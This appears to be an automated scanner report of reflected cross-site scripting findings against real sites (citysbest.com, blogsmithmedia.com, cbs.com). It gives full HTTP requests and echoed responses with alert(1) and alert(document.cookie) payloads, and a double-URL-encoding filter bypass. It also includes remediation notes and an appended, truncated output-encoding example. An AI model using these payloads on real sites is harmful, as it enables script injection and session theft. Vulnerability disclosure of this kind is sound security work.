Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:32 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 5.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5263a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68c5b25362 was submitted in the REST URL parameter 3. This input was echoed as 5263a</script><script>alert(1)</script>68c5b25362 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/include/citysbest-min.js5263a%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e68c5b25362?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Server: Apache/2.2 Content-Type: text/html Expires: Sun, 06 Feb 2011 20:33:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 20:33:40 GMT Connection: close Vary: Accept-Encoding Content-Length: 17181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8067e"><script>alert(1)</script>4d5b9bcd035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/include/citysbest-min.js8067e"><script>alert(1)</script>4d5b9bcd035?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:37 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/include/citysbest-min.js8067e"><script>alert(1)</script>4d5b9bcd035?29"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbc2"><script>alert(1)</script>68a23f41548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/media2dbc2"><script>alert(1)</script>68a23f41548/citysbest-min.css?1 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/media2dbc2"><script>alert(1)</script>68a23f41548/citysbest-min.css?1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e675d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e541a2799520 was submitted in the REST URL parameter 2. This input was echoed as e675d</script><script>alert(1)</script>541a2799520 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/mediae675d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e541a2799520/citysbest-min.css?1 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... 265.pfxID="acg"; s_265.pageName=s_265.pfxID+" : "+pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab18e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4284ffb3765 was submitted in the REST URL parameter 3. This input was echoed as ab18e</script><script>alert(1)</script>4284ffb3765 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /www.citysbest.com/media/citysbest-min.cssab18e%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4284ffb3765?1 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... +pageName; s_265.channel="us.citybest"; s_265.linkInternalFilters="javascript:,citysbest.com";
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bd84"><script>alert(1)</script>0353f801000 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www.citysbest.com/media/citysbest-min.css8bd84"><script>alert(1)</script>0353f801000?1 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/html
Expires: Sun, 06 Feb 2011 20:33:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:33:37 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <meta property="og:url" content="http://www.citysbest.com/media/citysbest-min.css8bd84"><script>alert(1)</script>0353f801000?1"/> ...[SNIP]...
1.280. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cbs.com
Path: /primetime/big_bang_theory/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c0f6"-alert(1)-"e4eac61e9e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?4c0f6"-alert(1)-"e4eac61e9e2=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... /672/71/CBS_BIGBANG_414_IMAGE_CIAN_140x80.jpg", title: "The Big Bang Theory - The Thespian Catalyst", message: 'Cool message here', backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6"-alert(1)-"e4eac61e9e2=1", //when clicked on title description: "Sheldon hopes acting lessons from Penny will help him become a better teacher. Meanwhile, Koothrappali fantasizes about his best friend\'s girlfriend.",
The value of the nrd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30822"-alert(1)-"b5ec47ba216 was submitted in the nrd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y&nrd=130822"-alert(1)-"b5ec47ba216 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Status: 404 Not Found
X-Real-Server: ws3172.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 06 Feb 2011 20:16:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:16:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:48 GMT
Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:48 GMT
Content-Length: 81585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... jpg", title: "The Big Bang Theory - The Thespian Catalyst", message: 'Cool message here', backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y&nrd=130822"-alert(1)-"b5ec47ba216", //when clicked on title description: "Sheldon hopes acting lessons from Penny will help him become a better teacher. Meanwhile, Koothrappali fantasizes about his best friend\'s girlfriend.", st ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51552'%3balert(1)//95d5c871903 was submitted in the pid parameter. This input was echoed as 51552';alert(1)//95d5c871903 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y51552'%3balert(1)//95d5c871903&nrd=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Status: 404 Not Found
X-Real-Server: ws3198.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 06 Feb 2011 20:16:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:16:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:43 GMT
Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:43 GMT
Content-Length: 79509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 141fb"%3balert(1)//565b10a0203 was submitted in the pid parameter. This input was echoed as 141fb";alert(1)//565b10a0203 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y141fb"%3balert(1)//565b10a0203&nrd=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Status: 404 Not Found
X-Real-Server: ws3227.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 06 Feb 2011 20:16:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:16:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:41 GMT
Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:41 GMT
Content-Length: 84324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... <script language="javascript" type="text/javascript"> var pid = "8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y141fb";alert(1)//565b10a0203";
The value of the pid request parameter is copied into a JavaScript rest-of-line comment. The payload adbfe%0aalert(1)//96ecf22eb82 was submitted in the pid parameter. This input was echoed as adbfe alert(1)//96ecf22eb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4yadbfe%0aalert(1)//96ecf22eb82&nrd=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Status: 404 Not Found
X-Real-Server: ws3172.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 06 Feb 2011 20:16:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:44 GMT
Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:44 GMT
Content-Length: 84308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... language="Javascript"> jQuery(document).ready(function() { jQuery.noConflict(); //jQuery('#copy_url').val("http://www.cbs.com/primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4yadbfe alert(1)//96ecf22eb82") jQuery('#copy_url').click(function(){ jQuery('#copy_url').focus(); jQuery('#copy_url').select(); });
var vEmbed = "<object width='400' height='300'> ...[SNIP]...
The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e96"><script>alert(1)</script>daa85ffaa37 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /primetime/big_bang_theory/video/?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y19e96"><script>alert(1)</script>daa85ffaa37&nrd=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.14
Status: 404 Not Found
X-Real-Server: ws3227.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 06 Feb 2011 20:16:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:16:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Sun, 06-Feb-2011 21:16:25 GMT
Set-Cookie: video_section=Default; expires=Sun, 06-Feb-2011 21:16:25 GMT
Content-Length: 79723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<!-- SEO Begin --> <m ...[SNIP]... <link rel="video_src" href="http://www.cbs.com/thunder/canplayer/canplayer.swf?pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y19e96"><script>alert(1)</script>daa85ffaa37&partner=cbs&gen=1&autoPlayVid=true" /> ...[SNIP]...
The value of the files request parameter is copied into a JavaScript rest-of-line comment. The payload 7a618%0aalert(1)//448eb782eaf was submitted in the files parameter. This input was echoed as 7a618 alert(1)//448eb782eaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=http://ocp.cbs.com/adFunctions.js?site=164|/primetime/big_bang_theory/js/dw_site.js|/sitecommon/js/dw_global.js7a618%0aalert(1)//448eb782eaf HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3179.drt.cbsig.net
Content-Type: application/javascript
Expires: Sun, 06 Feb 2011 20:32:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:32:18 GMT
Connection: close
Content-Length: 22986
The value of the files request parameter is copied into the HTML document as plain text between tags. The payload 207e6<script>alert(1)</script>c040d4c2270 was submitted in the files parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=207e6<script>alert(1)</script>c040d4c2270 HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3179.drt.cbsig.net
Content-Type: application/javascript
Expires: Sun, 06 Feb 2011 20:32:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:32:17 GMT
Connection: close
Content-Length: 59
1.288. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cbs.com
Path: /sitecommon/includes/cacheable/combine.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload cedf2%0aalert(1)//b98a9b47bff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cedf2 alert(1)//b98a9b47bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitecommon/includes/cacheable/combine.php?type=js&files=http://ocp.cbs.com/adFunctions.js?site=164|/primetime/big_bang_theory/js/dw_site.js|/sitecommon/js/dw_globa/cedf2%0aalert(1)//b98a9b47bffl.js HTTP/1.1
Host: www.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b
Response
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
X-Real-Server: ws3177.drt.cbsig.net
Content-Type: application/javascript
Expires: Sun, 06 Feb 2011 20:32:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:32:18 GMT
Connection: close
Content-Length: 22987
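The cbs.com findings above reflect the same value into three different sinks: a double-quoted JavaScript string (`var pid = "..."`), a commented-out JavaScript line (`//jQuery('#copy_url').val("...")`), and a double-quoted HTML attribute. Each needs its own encoder, and the newline-into-comment case shows why "the data is inside a comment" is not a defence. The following is an added example, not code from the scan report or from the scanned sites: it rebuilds each sink with raw concatenation and with context-specific encoding, feeds in the report's own payloads, and executes the generated script fragments in a sandboxed `Function` with a stand-in `alert()` to show which versions actually run attacker code. The host name `host.invalid` and all helper names are this example's own.

```javascript
// Added example, not code from the scan report or from the scanned sites.
// Rebuilds the three sinks from the report (JS string, JS comment, HTML
// attribute) vulnerable and hardened, and runs the script versions in a
// sandboxed Function to show which ones execute alert().

// JS string literal safe to embed in a <script> block: JSON handles quotes,
// backslashes and newlines; the extra replacements cover '<', '>' and '&'
// (so "</script>" can never reach the HTML parser) and the U+2028/U+2029
// line terminators, which JSON leaves raw.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Encoder for a double-quoted HTML attribute value such as og:url content.
function htmlAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
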